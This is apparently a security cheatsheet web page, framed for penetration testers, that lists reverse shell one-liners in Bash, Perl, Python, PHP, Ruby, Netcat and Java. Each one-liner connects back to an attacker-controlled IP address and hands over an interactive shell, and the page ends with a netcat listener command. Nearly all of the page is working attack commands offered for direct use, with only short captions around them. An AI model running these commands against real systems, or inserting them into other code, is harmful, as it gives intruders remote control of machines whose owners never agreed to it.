Reduce bottlenecks in code reviews

Self-Hosted AI Code Reviewer

Hexmos LiveReview AI-Powered Code Review
Live Review
AI-Powered Code Review

Reverse Shell Generator - Create Interactive Shells

Generate various reverse shell commands for different languages like Bash, Python, Perl, PHP, Ruby, Netcat, and Java. Essential tool for penetration testing and security professionals.

Reverse Shell Generator

A reverse shell provides an interactive command-line interface from a remote machine back to the attacker's machine. This is a crucial technique in penetration testing and security assessments. Below are examples of reverse shell commands implemented in various popular programming languages and tools.

Bash Reverse Shell

The simplest and most common reverse shell, utilizing Bash's built-in networking capabilities.

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Perl Reverse Shell

A Perl script that establishes a TCP connection and executes a shell.

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python Reverse Shell

A Python one-liner to create a reverse shell, leveraging the `socket` and `subprocess` modules.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP Reverse Shell

A concise PHP snippet for establishing a reverse shell connection.

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby Reverse Shell

A Ruby implementation for creating an interactive reverse shell.

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat Reverse Shell

Using Netcat (nc) for both initiating and listening for reverse shells. Note the use of `-e` for execution, which might not be available on all systems.

# Linux
nc -e /bin/sh target 4444 # or /bin/bash if sh doesn't work

# Windows
nc.exe 192.168.100.113 4444 –e cmd.exe

Netcat Listener

The command to set up a listener on the attacker's machine to receive incoming connections.

nc -lvnp 4444

Java Reverse Shell

A Java reverse shell example that redirects standard input, output, and error streams to a TCP socket.

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Further Resources

← Back to security cheatsheets All cheatsheets 🙏  Credits & Acknowledgments